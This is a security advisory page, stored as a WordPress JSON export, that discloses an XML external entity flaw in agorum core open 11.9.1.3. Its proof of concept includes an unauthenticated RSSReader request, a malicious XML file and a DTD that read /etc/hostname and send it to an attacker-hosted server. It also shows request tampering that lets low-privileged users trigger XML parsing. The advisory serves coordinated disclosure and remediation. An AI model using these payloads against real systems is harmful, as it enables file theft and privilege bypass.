{"id":24243,"date":"2025-06-27T16:07:57","date_gmt":"2025-06-27T14:07:57","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0024\/"},"modified":"2025-07-01T10:22:37","modified_gmt":"2025-07-01T08:22:37","slug":"usd-2025-0024","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0024\/","title":{"rendered":"usd-2025-0024"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n<h1>usd-2025-0024 | Agorum core open 11.9.1.3-1857 - Improper Restriction of XML External Entity Reference<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: Agorum core open<br \/><strong>Affected Version<\/strong>: 11.9.1.3-1857<br \/><strong>Vulnerability Type<\/strong>: Improper Restriction of XML External Entity Reference (CWE-611)<br \/><strong>Security Risk<\/strong>: High<br \/><strong>Vendor<\/strong>: Agorum<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.agorum.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.agorum.com\/<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>CVE Number<\/strong>: Requested<br \/><strong>CVE Link<\/strong>: Requested<br \/><strong>Advisory ID<\/strong>: usd-2025-0024<\/p>\n<h3>Description<\/h3>\n<p><!-- add a description of the application and vulnerability -->agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.<\/p>\n<h3>Proof of Concept<\/h3>\n<p><!-- describe how the vulnerability can be exploited, feel free to add supporting images etc. -->agorum core is susceptible to improper restriction of XML External Entity (XXE) references across multiple components. This vulnerability enables attackers to manipulate XML input, exposing sensitive data.<\/p>\n<p><strong>RSSReader<\/strong><\/p>\n<p>The RSSReader component of the submodule desk4web located in <strong>agorumcore\/jboss\/server\/default\/deploy\/roi.ear\/roiwebui.war\/desk4web_module\/gadgets\/rssreader\/RSSReader.jsp<\/strong> can be used to read arbitrary files via XXE in the <strong>feed<\/strong> parameter. The following request can be executed without prior authentication:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">GET<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/roiwebui\/desk4web_module\/gadgets\/rssreader\/RSSReader.jsp?reloadTime=600000&amp;feed=[http:\/\/localhost:8000\/attack.xml]()<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<\/span><\/pre>\n<\/div>\n<p>As demonstrated, it is possible to load an external XML file via the <strong>feed<\/strong> parameter. For example, a malicious file crafted by an attacker could look like the following:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"cp\" style=\"background: #263238;color: #546e7a;font-style: italic\">&lt;!DOCTYPE item [<\/span><span class=\"cp\" style=\"background: #263238;color: #546e7a;font-style: italic\">&lt;!ENTITY % remote SYSTEM \"[http:\/\/localhost:8000\/xxe.dtd\"&gt;<\/span>]()%remote;%intern;%xxe;<span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span>]&gt;<br \/><span class=\"nt\" style=\"background: #263238;color: #ff5370\">&lt;item&gt;<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">&lt;title&gt;<\/span><span class=\"ni\" style=\"background: #263238;color: #89ddff\">&amp;xxe;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">&lt;\/title&gt;<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">&lt;summary&gt;<\/span>test<span class=\"nt\" style=\"background: #263238;color: #ff5370\">&lt;\/summary&gt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">&lt;\/item&gt;<\/span><\/pre>\n<\/div>\n<p>The referecend <strong>xxe.dtd<\/strong> could be created as follows:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"cp\" style=\"background: #263238;color: #546e7a;font-style: italic\">&lt;!ENTITY % payl SYSTEM \"file:\/\/\/etc\/hostname\"&gt;<br \/><\/span><span class=\"cp\" style=\"background: #263238;color: #546e7a;font-style: italic\">&lt;!ENTITY % intern \"&lt;!ENTITY % xxe SYSTEM '[http:\/\/localhost:8000\/%payl;'&gt;<\/span>\"&gt;]()<\/pre>\n<\/div>\n<p>Initially, the <strong>attack.xml<\/strong> file is requested, which defines an external entity pointing to the attacker-controlled xxe.dtd. Upon loading the DTD, the parser is instructed to access the local file <strong>\/etc\/hostname<\/strong>, allowing the attacker to exfiltrate its contents through a subsequent request.<\/p>\n<p><strong>Agorum Explorer<\/strong><\/p>\n<p>XML files can be uploaded via Agorum Explorer, as illustrated in the following screenshot:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx1.png\" width=\"875\" height=\"465\" alt=\"\" class=\"wp-image-24070 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx1.png 875w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx1-480x255.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 875px, 100vw\" \/><\/p>\n<p>An administrative user can execute XML by right-clicking and selecting Administration -&gt; Execute XML.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx3.png\" width=\"541\" height=\"619\" alt=\"\" class=\"wp-image-24072 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx3.png 541w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx3-480x549.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 541px, 100vw\" \/><\/p>\n<p>The attack then proceeds in the same manner as previously demonstrated in the RSSReader component.<\/p>\n<p>Additionally, it is notable that low-privileged users cannot access the administrative menu in the web UI to execute XML, as shown in the following screenshot:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx2.png\" width=\"407\" height=\"613\" alt=\"\" class=\"wp-image-24074 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx2.png 407w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx2-199x300.png 199w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx2-266x400.png 266w\" sizes=\"(max-width: 407px) 100vw, 407px\" \/><\/p>\n<p>However, the request sent to the server when an administrative user executes XML can also be triggered within a low-privileged session. A low-privileged user can send the following request to execute XML for their uploaded file:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">POST<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/api\/rest\/filingAssistant\/v2\/action<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cookie<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">JSESSIONID=[REDACTED];<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">User-Agent<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mozilla\/5.0 (X11; Linux x86_64; rv:128.0) Gecko\/20100101 Firefox\/128.0<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/json<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept-Language<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">en-US,en;q=0.5<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept-Encoding<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">gzip, deflate, br<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/x-www-form-urlencoded; charset=UTF-8<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Requested-With<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">XMLHttpRequest<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">79<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Origin<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">[https:\/\/localhost]()<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Referer<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">[https:\/\/localhost\/roiwebui\/aguila_module\/?type=agorum.home&amp;_nc=-1495020701]()<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Fetch-Dest<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">empty<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Fetch-Mode<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">cors<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Fetch-Site<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">same-origin<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Te<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">trailers<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Connection<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">keep-alive<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span class=\"nt\" style=\"background: #263238;color: #ff5370\">name<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">XMLAusf%C3%BChren<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">ids<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">%5b%221150481%22%5d<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">preliminary<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">source<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">data<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">%7B%7D<\/span><\/p>\n<\/div>\n<p>The only requirement is the object ID of the file, which is needed for the <strong>ids<\/strong> parameter. This ID can be easily obtained from the object information, accessible to low-privileged users in the web UI, as shown in the following screenshot:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx4.png\" width=\"454\" height=\"608\" alt=\"\" class=\"wp-image-24076 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx4.png 454w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx4-224x300.png 224w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx4-299x400.png 299w\" sizes=\"(max-width: 454px) 100vw, 454px\" \/><\/p>\n<p><strong>Desk4Web<\/strong><\/p>\n<p>The same behavior observed in the Explorer is present in the Desk4Web component. When an administrative user uploads an XML file, a checkbox appears to parse the XML after uploading, as shown in the following screenshot:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx5.png\" width=\"431\" height=\"391\" alt=\"\" class=\"wp-image-24078 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx5.png 431w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx5-300x272.png 300w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx5-400x363.png 400w\" sizes=\"(max-width: 431px) 100vw, 431px\" \/><\/p>\n<p>In contrast, low-privileged users do not have the option to select a checkbox to parse the XML in the web UI:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx6.png\" width=\"704\" height=\"381\" alt=\"\" class=\"wp-image-24080 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx6.png 704w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/xx6-480x260.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 704px, 100vw\" \/><\/p>\n<p>However, the parameter can be added in the server request multiform to the backend which allows then also to parse XML as a low privileged user. For this, the following parameter must be appended to the multiform:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">Content-Disposition: form-data; name=\"attribute(parseFile)\"<\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">true<\/span><\/pre>\n<\/div>\n<h3>Fix<\/h3>\n<p><!-- how the vendor can fix the vulnerability.--><br \/><!-- if you recommended a quick workaround to the customer (and they are fine with you including it here!) feel free to add this information as well -->It is recommended to configure XML parsers securely by disabling the processing of external entities and DTDs. Developers should also rely on secure parsing options or libraries specifically hardened against XXE attacks. Furthermore, validating and sanitizing all XML input can significantly reduce the risk of exploitation.<\/p>\n<p>&nbsp;<\/p>\n<p>Users of agorum core open can upgrade to versions 11.9.2 or 11.10.1.<\/p>\n<h3>References<\/h3>\n<p><!-- add references to the application and vulnerability.--><\/p>\n<ul>\n<li><a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/611.html\" target=\"_blank\" rel=\"noopener\">https:\/\/cwe.mitre.org\/data\/definitions\/611.html<\/a><\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2025-05-05<\/strong>: First contact request via mail.<\/li>\n<li><strong>2025-05-05<\/strong>: The vendor has confirmed the delivery and has begun investigating the matter.<\/li>\n<li><strong>2025-05-07<\/strong>: The vendor has begun addressing and fixing the issue.<\/li>\n<li><strong>2025-05-15<\/strong>: The vendor has addressed and fixed the vulnerability within the cloud instances.<\/li>\n<li><strong>2025-05-30<\/strong>: The vendor released fixed versions 11.9.2 and 11.10.1.<\/li>\n<li><strong>2025-06-16<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><!-- add the names of the persons that discovered the vulnerability. This information will be sent to the vendor and published on the HeroLab blog -->This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2025-0024 | Agorum core open 11.9.1.3-1857 - Improper Restriction of XML External Entity Reference Product: Agorum core openAffected Version: 11.9.1.3-1857Vulnerability Type: Improper Restriction of XML External Entity Reference (CWE-611)Security Risk: HighVendor: AgorumVendor URL: https:\/\/www.agorum.com\/Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: RequestedCVE Link: RequestedAdvisory ID: usd-2025-0024 Description agorum core is an open-source Enterprise Content Management (ECM) [&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-24243","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24243","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=24243"}],"version-history":[{"count":3,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24243\/revisions"}],"predecessor-version":[{"id":24246,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24243\/revisions\/24246"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=24243"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}